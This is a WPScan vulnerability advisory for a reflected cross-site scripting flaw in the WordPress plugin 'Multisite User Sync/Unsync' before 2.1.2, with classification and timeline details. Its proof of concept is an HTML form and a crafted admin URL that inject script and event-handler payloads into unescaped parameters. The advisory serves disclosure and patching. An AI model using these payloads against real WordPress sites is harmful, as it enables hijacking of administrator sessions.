WordPress Plugin Vulnerabilities
Multisite User Sync/Unsync < 2.1.2 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the wmus_source_blog and wmus_record_per_page parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/network/admin.php?page=wmus" method="POST">
<input type="hidden" name="wmus_source_blog" value='1"><script>alert(/XSS-source_blog/)</script>' />
<input type="hidden" name="wmus_record_per_page" value='10"><script>alert(/XSS-record/)</script>' />
<input type="hidden" name="submit" value="Filter" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
https://example.com/wp-admin/network/admin.php?page=wmus&s=lxk1g%22+onfocus%3Dalert%281%29+autofocus%3D+xaycjmgr032&wmus_source_blog=1&wmus_record_per_page=12&wmus_sync_unsync=1&wmus_destination_blogs%5B0%5D=2&wmus_destination_blogs%5B1%5D=3&wmus_destination_blogs%5B2%5D=4&wmus_destination_blogs%5B3%5D=5&submit=Sync%2FUnsync
Affects Plugins
Fixed in 2.1.2 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Asif Nawaz Minhas
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2023-04-12 (about 1 years ago)
WPScan 